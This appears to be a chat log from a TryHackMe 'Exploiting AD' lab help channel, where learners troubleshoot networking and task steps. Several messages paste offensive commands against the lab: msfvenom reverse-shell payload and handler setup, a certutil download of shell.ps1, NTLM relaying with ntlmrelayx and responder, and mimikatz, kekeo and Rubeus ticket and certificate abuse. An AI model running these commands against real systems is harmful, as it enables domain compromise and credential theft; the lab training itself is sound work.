Hi!! I think this network is down. I've tried to ping the DC from the Attackbox and from a Kali Machine connected with the ovpn of the network, and I receive the same response:
$ ping 10.200.125.101
PING 10.200.125.101 (10.200.125.101) 56(84) bytes of data.
From 10.50.122.1 icmp_seq=1 Destination Host Unreachable
From 10.50.122.1 icmp_seq=2 Destination Host Unreachable
From 10.50.122.1 icmp_seq=3 Destination Host Unreachable
125 definitely your subnet?
Yes, It's the one I see in https://tryhackme.com/room/exploitingad as the THMDCIP
I cannot send you a screenshot
Are you on a vm or attackbox?
both, but now in a vm to test it in a different way
Check the pinned posts, I wrote steps to connect
Vote to reset
I'd already done it and didn't work
15 or 20 mins ago
Ahhh it's a voting, sorry, as I told you, I'd already voted
2/4
After waiting until the network time expires and then start it again, it works
hi all - i'm having some trouble with Task5. When I setup a python web server I cannot download the file to the THMSERVER1. I'm using a kali linux box with OpenVPN connection. Any thoughts?
It seems like data is having trouble communicating over the VPN. When I use the attack box things time out frequently on me....
Using this command from powershell on THMSERVER1: certutil.exe -urlcache -split -f http://vpn-ip/shell.ps1 - note the python web server is running on port 80
from my kali machine i'm able to pull up the web server, so it is working
so i'm not 100% sure what happened but this morning I was able to actually download the shell.ps1 meterpreter file to my windows machine without any issue. Thanks if someone did something to fix that!
I will say though, having all these problems and having to redo the first 3 tasks repeatedly has given me quite a bit of familiarity in doing them comfortably
Hi, I have a problem with the golden ticket in the Active Directory exploiting room. I've tried four times with my kali vm and the attackbox but it doesn't work.
Hey everyone
Is there any report made in
How someone was able to compromise AD just by getting onto their network
Meaning got the AD control and did all AD enumeration without being an AD user
I know there's methods of people getting on the network with NON-domain workstations and then creating workstation objects and joining them to domains. Here's an article of folks getting onto the network and then running responder to gather initial foothold
https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html
in the Breaching AD room they use a tool called Responder that picks up broadcasted packets if SMB signing isn't turned on. From the packet you can attempt to crack the password hash and get in without a domain account. This is if i'm remembering it correctly
Hello, why i cant RDP to THMSERVER2.za.tryhackme.loc with username: phillip.wilkins. Ssh i can connect but no RDP ??
[19:35:02:873] [25424:25425] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[19:35:02:873] [25424:25425] [WARN][com.freerdp.crypto] - CN = THMSERVER2.za.tryhackme.loc
[19:35:02:477] [25424:25425] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Spojení zrušeno druhou stranou
[19:35:02:477] [25424:25425] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:35:04:769] [25424:25425] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Spojení zrušeno druhou stranou
[19:35:04:769] [25424:25425] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:35:04:769] [25424:25425] [ERROR][com.freerdp.core] - freerdp_post_connect failed
za\phillip.wilkins@THMSERVER2 C:\Users>whoami
za\phillip.wilkins
za\phillip.wilkins@THMSERVER2 C:\Users>hostname
THMSERVER2
za\phillip.wilkins@THMSERVER2 C:\Users>
room: exploitingad , task 6
In Task 2 "Exploiting Permission Delegation", there is mention of THMJMP1, which I believe should be THMWRK1 - in this network room.
You start from thmjmp1, force change the password of a Tier2 admin, which then allows you to authenticate to thmwrk1 as that Tier2 admin.
@dim scaffold The name thmjmp1 does not resolve in this network.
This is where Task 1 starts:
"
For SSH access, you can use the following SSH command:
ssh za.tryhackme.loc\<AD Username>@thmwrk1.za.tryhackme.loc
"
Some of the AD rooms use the 'exploitad' interface, and some use the 'lateralmovement', and the IP addresses and TLD are different, so I'm guessing that the THMJMP1 is from the 'lateralmovement' side of things. (And there's also the 'persistad' network interface, so I suppose there are at least 3 distinct AD networks.)
Ah I see what you mean - sounds like a #room-bugs report!
Thanks, @dim scaffold! Good to have confirmation.
Gave +1 Rep to @dim scaffold (current: #337 - 13)
I think THMSERVER1 failed to come back up after trying a "shutdown -r" from meterpreter in Task 5 "Exploiting AD Users" (the keylogger task, migrating to explorer, ...)
About keylogging and Meterpreter, is explorer.exe the only suitable process to migrate to? Are keyboard events only available to this process?
I'm having an issue with Task5. I generated my msfvenom powershell script, copied it to thmserver1, run the one-liner to start msfconsole listener, I run the ps script, I see a thread number appear and then the powershell prompt drops and my listener never receives the callback.
I am running on my own kali machine.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=exploitad LPORT=4444 -f psh -o shell.ps1
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST exploitad; set LPORT 4444; exploit"
What's this? "LHOST=exploitad" - LHOST should equal your local IP address. It's a confusing typo in the task; sometimes one has to outsmart the task since 'bless 'em', things like this have been reported many times but aren't addressed.
if you do LHOST=exploitad it will put in the IP of that interface
so you could do LHOST=eth0 and it will use the IP on eth0
LHOST = LOCAL host.
Is this implying that I need to do SSH tunneling? I have tried creating the payload and console with just IPs and not the interface names.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.50.122.151 LPORT=4444 -f psh -o twep191shell.ps1
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.50.122.151; set LPORT 4444; exploit"
That's what I did but used my IP instead of the interface name. It gave those 2 commands and the certutil to download it to the machine
which I did. I figured it would be just run the ps1 script with the metasploit console listening
I "figured" it out. I was using psexec.py to connect to the .201 address with the hash. I used evil-winrm and the hash, then ran the powershell script and it worked...
I am upload data from zip file and look like the Users, Domains, OUS, GPOS is 0 what's wrong on my bloodhound ?
look like this network is weird ... i am on xfreerdp session and autologout without when i type something. and check the network broke :
┌──(kali㉿kali)-[~/TryHackMe/ExploitAD]
└─$ nslookup thmdc.za.tryhackme.loc
;; communications error to 10.200.129.101#53: host unreachable
;; communications error to 10.200.129.101#53: host unreachable
;; communications error to 10.200.129.101#53: timed out
;; no servers could be reached
┌──(kali㉿kali)-[~/TryHackMe/ExploitAD]
└─$ cat /etc/resolv.conf
# Generated by NetworkManager
search 1.1.1.1
nameserver 10.200.129.101
My configuration was set up and i had completed TASK 2 To Jump To TIER 2 ADMINS and got the flag1.txt
is the network down ?
wew ... after network restart can finished this room... learn a lot from here ... thx for the room creator
I performed ntlm relay attack with mitm6 and ntlmrelayx. I used mitm6 for dns spoofing. When the victim sent a query containing where the DHCP is located, I identified myself as the DHCP server. Then I became proxy with WPAD so victim makes any http request through me. I responded 407 authentication for any http request thus I caught NTLM response. Finally I relayed NTLM response to SMB and I gained shell. I got this attack and I performed PoC.
I wonder if this attack is specific to IPv6? I performed same thing for IPv4. I read that mitm6 spoofs dns in IPv4 so I used mitm6 for dns spoofing and then I started ntlmrelayx tool. But I could not catch NTLM response. So it did not work.
After that I decided to use responder to catch NTLM response with these options.
responder -I "eth0" --DHCP --DHCP-DNS -FPw -v
According to my logic, since my goal is to manipulate the WPAD file, I need to take over DNS, and to announce myself as the DNS, I need to hijack the DHCP server. Therefore, I initiated the Responder tool with the settings mentioned above. Then I started ntlmrelayx tool but again I could not catch NTLM response. I compared the IPv6 and IPv4 attack. I couldn't see 407 status code on wireshark. So why did this attack not work for IPv4?
Working on this room in subnet 12 (DC is 10.200.12.101) and can only ping DC at the moment, is anyone able to check this network?
Hey guys I tried everything including restarting the network and leaving the room, I did everything 3 times from start to finish and it still doesnt work
Task 3: Exploiting Kerberos Delegation
At the end where you type privilege::debug and then kerberos::ptt <TGS> you're supposed to get a response like * File: '<TGS>' OK
But instead Im getting * File: '<TGS>' ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
SOLVED
When creating TGT and TGS using kekeo, the files were saving in the directory of kekeo (obvious, i know.)
but when I was executing Mimikatz, i first cd'd into the directory of Mimikatz, which caused the problem
Solution: cd into the kekeo directory where the files are, and then execute mimikatz from there using the full path where mimikatz is located.
Hi, I've faced some issue with the task 3 of this room. Actually i carefully followed the path but when I received my two TGS (useful for the PSSESSION) I constantly got the error : " File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LO': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)" And i can't understand why
@forest stag try this solution #exploiting-ad message
Okay thanks you i will give a try !
You have to do it with the T2 admin user you got in the previous task
I've tried it, i can see tickets saved when running dir but when I start mimikatz from the directory, i can't run kerberos::ptt , the command isn't found ERROR mimikatz_doLocal ; "kerberos:ptt" command of "standard" module not found !
Hey guys, those who find the .kdbx file in Administrator: that file will not work, as someone overwrote the Admin database with the Trevor local database, so in order to find the right .kdbx cd to trevor.local and there you find the right .kdbx file
Hi guys, I'm doing all of the available AD Networks.
At the top of each room, there is a diagram of computers and servers, with the hostname and IP address for each one of them.
How would one find if there are multiple servers and machines in the AD?
for example:
In exploitingad, there is
distributor.za.tryhackme.loc
THMSERVER2
THMWRK1
etc.
How would we find all these machines if the diagram wasn't prepared for us at the top of the room already?
Use bloodhound for that
bloodhound need json file to load the diagram. We still need to loot it using SharpHound.
CMIIW
if you know how bloodhound works it's clear that the sharphound is needed for that ;
hello guys, I have a question about AD, even ad pre-authentication is very important for mitigating replay attacks by adding timestamps.
But how does it mitigate offline bruteforcing too (AS-REP Roasting attacks), can someone correct my understanding, can't the attacker just intercept the very first request (AS-REQ) that the user make which contain a timestamp encrypted with user hash and try to brute force it, and then if he could get the key, he could simply generate another request with another timestamp and encrypt it with that key?
or it just mitigates if there is no man in the middle attacks?
@modest latch - as good reading material on the matter:
https://medium.com/r3d-buck3t/kerberos-attacks-as-rep-roasting-2549fd757b5
Thank you, I will look into it
Gave +1 Rep to @rare bolt (current: #1321 - 2)
Hey there, I'm having trouble with Exploiting AD room. I can't get mimikatz to elevate the token. Looks like I am doing just as it shows on the room but I get error instead of the expected output
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
as I understand I must be an Administrator to be able to do that
oh.. I got it, must have used all the tasks until this one to stay administrator
looks like no one alive in here. no I met this problem that svcServMan password doesn't fit. Did anyone change it?
ya someone change it
someone overwrite Admin database with some other
you need pass? i can
anybody can help me with pdf exploit that the author changed the compiling server and its not functional anyone can fix it?
Hi all, running into an issue on task 2 trying to import TGS from kekeo into mimikatz, anyone able to help please? I have tried with normal token and elevated but still no luck
Ignore above, if anyone has same issue the requests from kekeo are stored in the kekeo directory so you will have to run mimikatz from there or move the files
in exploitingad task 5 , is there something special to do in order to open the kdbx file?
Have you downloaded the file onto the attack box and installed keepass?
I tried multiple ways, I tried on my local machine with keepassxc and keepass2 (kali/linux), keepass (windows), keepass2john & hashcat, I even did rdp on the thmserver1 with the trevor.local account and used the keepass there. Tried the 3 kdbx files. The password was accepted as correct answer on the room webpage. But I don't think I tried the attackbox. Let me try that too.
keepassx on the attackerbox also gives me: "Unable to open the database. Wrong key or database file is corrupt."
I found the issue, the password I used was truncated. I guess I got confused because in the room that truncated password was shown as "correct answer".
thanks for the help
Sorry I have just seen these, no worries, glad you solved it!
I'd like to ask someone about a real life scenario! If I'm trying to exploit the certificates as we can see in this room, and I'm at the 'Finding Vulnerable Certificate Templates' section, how should I find out which template is vulnerable? Here we've got the number, that it's Template32. But what should I look for to find it out myself? Those parameters given? If yes... should I check every single template one by one to find one, or is there a faster way?
Have you looked at the PSPKI audit tool that is mentioned within the room? I haven't used it on a job but from looking at the Get-CertRequest function it looks like it can automate the manual aspect of inspecting cert templates for dangerous permissions
"Get-CertRequest - Examines a CA's issued certificates by querying the CA's database. Primary intention is to discover certificate requests that may have abused a certificate template privilege escalation vulnerability."
https://github.com/GhostPack/PSPKIAudit
i had never used attackbox for network , so do i need to do anything for attackbox ,coz i thought u dont need to do anything in attackbox
update:solved
was just about to point you towards the first tasks in the network rooms that go over the setup process for both the attackbox and your own kali vm
The network has been failing for a few days and does not resolve
Did you set the /etc/resolv.conf file?
yes and apart from that I tried attackbox and it doesn't work either
Check if the link in the task works, nslookup can be annoying.
I also tried the page to generate the credentials and nothing
yall need to teach me how to exploit like that I just started
IDK if what i am doing is right or wrong but i can connect to the network. I am using a VM and use nmtui to add the DNS conf manually and restart the network config. My VM is using wifi so my ethernet card can be modified to connect to the THM network.
But in some case it lost connection and need to re-config again
can we reset the network>?
ssh za.tryhackme.loc\t2_caroline.dawson@thmwrk1.za.tryhackme.loc
ssh: connect to host thmwrk1.za.tryhackme.loc port 22: No route to host
thanks for sharing the solution
Gave +1 Rep to @tidal owl (current: #561 - 7)
You're welcome
any solutions can't ping to the THMWRK1 ? tried using both own machine and attackbox
Leave and join again or download new vpn file
Tried everything, but finally fixed it by resetting the network. Thank You!
Working through AD Certificate Templates Room on Task 3's last question:
"Which certificate template is misconfigured based on the three provided parameters?"
Has me stumped I have gone onto the target host and run the commands outlined and I do not find the answer "**** *******"
Nm I got it
BF for the win
Hi
How to fix it
access is denied
I need to exploit THMSERVER1 First right?
I just run SpoolSample.exe in THMWRK1
I'm still waiting for help
Its been 4 days.
You still need help?
I see
guys can someone help me to reset the machine
it's stuck and doesn't work
as always
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:belo.pfx /password:Coobll123! /outfile:fnot /domain:za.tryhackme.loc /dc:10.200.12.101
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=Belo
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
somebody know how to fix it?
please guys I'm stuck here, and on the internet i can't find any possible solution
I saw someone with the same error did you manage to fix it?
@glacial stream Hello, sorry for this call, but i read the chat and found you solved the KDC_ERR last year, can you fix this again?
Y, but nothing
I guess their fix is "reset of the machine"
Thanks for the report. Yearly time again to renew all certificates. They are sadly only valid for a year. Will make the update
Gave +1 Rep to @urban nexus (current: #716 - 5)
Thank you so much for your attention!
Gave +1 Rep to @glacial stream (current: #29 - 278)
Hey @glacial stream you solved the issue?
It isn't a quick fix. I need to reimage all of the network images. Otherwise hosts will lose trust with the domain. So I've asked the support team to load my profile into the isolated networks so I can make the changes and image. But it will take time.
Oh, sorry, I had no idea, but thanks for your explanation
Gave +1 Rep to @glacial stream (current: #29 - 279)
For certificate problem this is the steps to make work:
1 - Authenticate to the child domain controller
2 - Run mmc
3 - File -> add snap in
4 - Add the Certificates snap in but make sure to specific for the machine account
5 - View the personal certificates of the DC and see if the Kerberos or Client Authentication cert has expire
6 - If so, say request new certificate
7 - Follow the prompts and enroll for all three available certificates
8 - Retry your kerberos ticket and it should work
In case pin the message
having troubles on network 10.200.77.x connecting via ssh, could we get anyone to reset the network, only need 1 more vote
AD Exploitation - Task 7
Tried the whole setup many times. everything proper whats the issue
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
@glacial stream already mentioned the problem in a previous post. Unfortunately we have to wait for him to renew the certificates. @glacial stream could you post an update, when it's done please? Thank you
Guys it's not necessary to wait him, you can use admin credentials to login in THMCHILDDC, and renew the certificates. The credentials are in Persisting AD Room task 2.
Thank you, worked!
Gave +1 Rep to @urban nexus (current: #632 - 6)
@urban nexus Thanks for the info, it also worked for me
Gave +1 Rep to @urban nexus (current: #574 - 7)
Hello all, For Task 5 I have problems how we achieve reverse shell - very similar to @twilit crown #exploiting-ad message
I am having similar problematic executing the powershell on SERVER1.
I am also trying with the exported hashes from SERVER1 to perform Lateral movement from my AttackBox to SERVER1. I used evil-winrm but I have this strange output. Any ideas?
evil-winrm
Hey I was in active directory and using kerbrute "kerbrute userenum -d domain.local -dc ip-addr wordlist.txt" This is not working I have looked at every single documention github page and there is nothing on this issue I am using the latest version as well has anyone faced this as well??idt we can share images or I would've show this
Hi, for task 7 has anyone been able to perform the user impersonation through certificates, using Rubeus? After several reverts, I either receive a 'KDC_ERR_PADATA_TYPE_NOSUPP' or a 'KDC_ERR_C_PRINCIPAL_UNKNOWN' error message from Rubeus. I have tried the Discord channel suggestion of renewing the certificates on the DC, but this further breaks the ability to list certificate templates available for enrollment.
Can confirm that this method solved my issue when attempting to request a TGT with Rubeus. Rubeus just errored with [X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP. I connected to the Child DC and performed the listed steps. Even if the process displays an error, I clicked continue and it generated new certificates. Then I was able to retry and successfully get my TGT. Thank you.
I just completed this task. Still having issues?
Glad to help you
inspect your commands and verify filenames. If you follow the guide, you generate fullAdmin.pfx and later the Rubeus example uses vulncert.pfx. it may be as simple as filename.
Still having issues. Contacted support who suggested leaving the room, joining the room, and then regenerating the VPN pack. These steps did not fix the issue for me. I tried changing the filename, encryption parameters, resetting the network more than enough times. I have also tried using certipy-ad, but everything gives me errors. Not sure why the issue would affect just me at this stage, as I am using the same network as everyone else.
i'm on a different vlan than you are. but if you can confirm the childDC has valid certs, the only things I would suggest are 1) get new user creds. 2) generate the new certificate using a simple password. 3) stay in your directory and call c:\tools\rubeus.exe and reference your certificate file in the current directory.
Tried another user, but was unable to ssh using a newly generated credential. Did a further generation and could ssh using that user and their credentials. Attempted same tgt request with Rubeus and same error. Command is exactly like that in the task, and the supplied parameters are fine, as Rubeus would complain, for example cert not found, etc. I have the cert, I am able to call Rubeus, it runs without parameter errors, but the resultant output suggests KDC error. If I login to the DC, I can see the certs okay.
Are there any other requirements needed for this task to run, or is it possible to only connect to a new instance of the THMSERVER2 using the generated user from http://distributor.za.tryhackme.loc/creds via SSH/RDP, after adding this user to 'IT Support' AD group via THMWRK1 host access.
Here is the text version of the command I am using:
c:\Tools>Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\christine.hall\Desktop\vulncert.pfx /password:password /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101
Fixed the task 7 issue with the KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP error message. Delete all personal certificates on the THMCHILDDC at the x.x.x.101 address (grab credentials from persistingad room) by using mmc and certificates snap-in. Request new certificates and enroll all 4 that are available. I found the multiple certificates causing conflicts with Rubeus, and quite possibly the KDC authentication certificate in particular. Should complete with only 4 personal certificates in the list. Worth checking should other lab users requests multiple certificate enrollments.
im getting this exact error, what should I do to fix this issue? Thanks
Log on to the DC as administrator, delete all existing certificates, generate new certificates (4 in total). IP address and credentials can be found in the next module in task 2.
thanks that worked
Hi guys, anyone that can help me with this? - #exploiting-ad message
Using the information in Task 5 - "You have remote code execution on THMSERVER1, use this to get a Meterpreter shell. " - this was not successful when using the Print Spooler bug from THMSERVER2 to THMSERVER1 using NTLMRelay from our AttackBox. Probably because we are in the context of machine account THMSERVER2$, but based on the exercise when we perform RCE through this exploit we are SYSTEM, which is strange, as the execution of the command on the remote system could execute the payload which I have downloaded on THMSERVER1 using the RCE + certutil. Does anyone know the reason behind this?
I couldn't perform any other RCE, so I needed to use the dumped credentials from THMSERVER1 and use them. I connected using ServerAdmin with evil-winrm to THMSERVER1, downloaded the payload for reverse shell and executed it. Then I had meterpreter.
can anyone tell me why i am not able to download the password.kdbx file from thmserver1.za.tryhackme.com? i have tried it with the SYSTEM user as well as trevor, i have tried both the powershell shell and the exe shell, it just doesn't want to work. i am on the exploiting AD users topic of the exploiting active directory room
Try with double slashes everywhere C:\\Users\\whatever
Use quotes when you specify the path or you can also navigate to the specific folder via CD and after just execute download PasswordDatabase.kdbx
Hello, I'm having a problem accessing the network, I waited 20 minutes and it wasn't resolved
Same here, we can't access the network
Hello! I can ping all the machines on the domain besides thmwrk1
Nslookup resolved to the ip of the domain controller, but I can't ssh back into thmwrk1
Subnet 10.200.77.0/24
I've restarted the network after hours of waiting, and still can't access the thmwrk1 machine either through OpenVPN or the AttackBox
Okay, so after waiting an hour and a half, I was once again able to ping THMWRK1 and ssh with the credentials.
I once again repeated the instructions in task 2 when I encountered EXACTLY THE SAME ISSUE.
Upon adding my domain user to "IT Support" group, I tried to change the password of a tier 2 admin, but met "Access Denied" again, so I followed the suggestion and exited the ssh connection as I waited for permissions to propagate throughout the domain.
NOW I CAN'T ping thmwrk1, let alone ssh back in.
Please help! Does anyone check these?!
Working now
I am not able to ping any machine even after restarting the network
Hi, I have a problem with my DNS resolution in this room. I've added DC IP to network manager and reset it. Then added "nameserver <DC IP>" in /etc/resolv.conf. The nslookup command works fine and shows proper IP address but I can't reach "http://distributor.za.tryhackme.loc/creds" or any other service via hostname, but via IP address it is pingable. Did I miss something in a configuration :/?
I've used these commands and it worked, if anyone could explain the difference I will be thankful :D:
resolvectl dns exploitad <DC IP>
resolvectl domain exploitad za.tryhackme.loc
Let me know if you have a solution regarding this.
Got the solution, You are an admin on that system so you can access the files of other users. Hope this helps.
Easy, add the THMIIS IP and the site domain
How can i get attackbox to get the exploitad interface? i started the room a while ago and wanted to complete it
Reset atb multiple times and leaving the room didn't help
I downloaded the ovpn file for exploitad, started vpn with sudo openvpn file and nothing. normal vpn to thm works
Any ideas
Is that screenshot of the exploitingad VPN or the normal one? It seems to be working
exploitad
Ah yeah I should've seen that myself - Then it should be working though? That output is what a working VPN looks like
Can you explain your issue a bit more?
I tried today and it worked.
With the screen I couldn't even ping the thmchilddc ip
strange, glad it is working now at least
it feels like these rooms are the best way to learn how to chill between bugs, weird network behaviors, connection loss... [Insert whatever here]
I'm trying to make it with my own Kali, but now vpn works and ntlmrelayx.py won't
Looks like pyOpenSSL is missing
It's like learning to hack while doing 1st-lvl support
No way to get it working in the newest kali
I hate this room, trying over 2h to get the attackbox functional and another 2 for the kali notebook
Mr. Biden says: Abide in Persisting AD next.
anyone know whether stuff from previous tasks need to be re-used for all tasks?
No, they shouldn't do.
I was watching Tyler Ramsbeys stream and task 3 appears to need task 2 done to complete task 3
I have not carried on with the other tasks but just wanted to know in case this is a room that needs to be done in one sitting for a specific set of tasks i.e 2-3 4-5 etc
Oh I thought you meant previous rooms
no just tasks
the other rooms were fine. I think this one seems to require a couple of answers from previous tasks, which means I guess I need to do it in one sitting
ok someone seems to have removed the flag3.txt from its intended location, seems like some people keep mucking about in this network
Vote to reset.
yep have done, needs another 4 people sadly
considering some of these tasks require steps done in the previous tasks its pretty sad to see people ruining it for others.
hello, is there a way i can find a free proxy?
What is the use-case?
i need to access a particular web platform that is restricted where i am
Then no, we will not be assisting you on this, we won't help you bypass restrictions placed on you
okay.. it's not an illegal platform. it's actually remotask
It doesn't matter.
okay..nice
can someone please help? Never got stuck like this,
This room is exploiting AD and I'm in the TIER 2 users and I can run Mimikatz but I cannot run Kekeo and I cannot understand why. I already passed this part but had to go over it again and this time I just can't run it
PS C:\Users\t2_alan.riley> C:\Tools\mimikatz_trunk\x64\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # exit
Bye!
PS C:\Users\t2_alan.riley> cd .\Desktop\
PS C:\Users\t2_alan.riley\Desktop> C:\Tools\kekeo\x64\kekeo.exe
Program 'kekeo.exe' failed to run: The specified executable is not a valid application for this OS
platform.At line:1 char:1
+ C:\Tools\kekeo\x64\kekeo.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ C:\Tools\kekeo\x64\kekeo.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
PS C:\Users\t2_alan.riley\Desktop>
maybe stupid, but have you tried to reset it?
When I was completing the AD rooms, I faced some problems which have been fixed with just reset/changing AD network.
Yess I have tried again and it all worked fine, without changing anything.
I also made it work by executing the win version instead of the x64, just by going into the other dir and executing it from there.
Hope it helps who needs it
Hi, can anyone help me and tell me why the script fails when i execute it:
root@ip-10-10-172-15:~# python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://10.200.12.201 -debug
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[*] Running in relay mode to single host
Traceback (most recent call last):
File "/opt/impacket/examples/ntlmrelayx.py", line 445, in <module>
c = start_servers(options, threads)
File "/opt/impacket/examples/ntlmrelayx.py", line 203, in start_servers
s = server(c)
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 102, in __init__
self.server = SMBSERVER((config.interfaceIp,smbport), config_parser = smbConfig)
File "/usr/local/lib/python3.9/dist-packages/impacket/smbserver.py", line 3967, in __init__
socketserver.TCPServer.__init__(self, server_address, handler_class)
File "/usr/lib/python3.9/socketserver.py", line 452, in __init__
self.server_bind()
File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
you were probably running responder before you ran impacket's ntlmrelayx...w/o changing the config on responder
hey , when trying to connect to the exploiting ad dns i got this error using the attack box "systemd-resolve --interface exploitad --set-dns 10.200.60.101 --set-domain za.tryhackme.loc
Failed to resolve interface "exploitad": No such device" someone can maybe help me ?
Please don't post the same message over multiple channels.
Sorry, I didn't know which channel to send it in
Anyone good at exploiting AD? I have some challenging machines that I am not able to solve. Need some help!
Ensure you're connected to the VPN, and in my version of kali it's now resolvectl dns exploitad 10.200.60.101
Also, why on earth is the domain naming convention for this network different than any of the others
it seems like the bloodhound data from the task may not match what's going on in the exercise... i'll see if I can pull fresh data with sharphound
Word to the wise, when you've got questions like that, be more specific!!! People can help you better if you're forthcoming with your issue and question.
i'm currently trying breachingad
i don't know how to solve this
In this room, the URL for obtaining credentials is written as
http://distributor.za.tryhackme.loc/creds
but it was actually https. It needs to be fixed.
Can I just stress do NOT try and complete Exploiting AD in safari browser?
WHO TF GOT IDEA TO GIVE ONE NETWORK TO 5 RANDOM PEOPLE
attackbox systemctl restart dnsmasq
10.50.81.75/24 if someone uses this subnet and doing exploitAD room. Sorry for changing password on t2_melanie davies
password now is : Dupacwela69!
i'm literally writing powershell commands with someone on one computer
@wraith harbor has been warned.
even though I force the gp update, access is still denied for password change, exploitAD ACEs module
can someone reset the lab please?
Need help on the Exploiting AD room. facing the issue and stuck. would like to know what mistake i am making.
For task 3 Exploiting Kerberos Delegation
As instructed, i am first using mimikatz.exe to dump the password of the service account based on the following sequence of commands:
- mimikatz # token::elevate
- mimikatz # lsadump::secrets
i get the password for the svcIIS@za.tryhackme.loc
then exit mimikatz.exe
Start kekeo.exe
run the following commands:
- kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:redacted
- kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
on another terminal, i start mimikatz and run the following commands:
- mimikatz # privilege::debug
- mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
After the above command, i am stuck and getting error as follows:
-- File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
i am not sure what the error is and what would be the solution for this. been stuck for long here.
Requesting help.
Thanks in advance.
Hi, I am trying to find the path from SVCSERVERMAN to THMSERVER2 machine as instructed in task6 but i cant seem to find the THMSERVER2 machine within my imported data (i downloaded this one from the attached task files)
this is how its instructed in task 6
Hy Guys I'm stuck
I have the problem that I can not see the nodes IP from the bottom. I can move every node from left to right and vice versa but not up or down.
Does any of you have an idea? I also retested the room but it happens nothing.
This is how the room has always been. Also you can easily find their IPs by running some basic commands you should know about if you've reached this room.
@sweet eagle ok, problem is solved now. The major problem was that I had completed breachingad 2 years ago and in the meantime many changes had happened. I was not able to connect to the machines like THMDC or THMCHILDDC, also IP ping wasn't working... now I reset the room breachingad, also I left the room, rejoined, and restarted the Attackbox, and now I'm able to access this network again from the attack box
@sweet eagle thank you anyway
lol. 2 Years later, I came to ask the exact same question. Was just re-doing old rooms and wanted to ask the same thing.
I am facing an issue with Task 7 Exploiting Certificates.
When using Rubeus to create a TGT with the exported certificate, I'm getting this error. I googled it and found that it can be fixed by restarting the DC. But how do I do it? Or is there any other way?
This is the error:
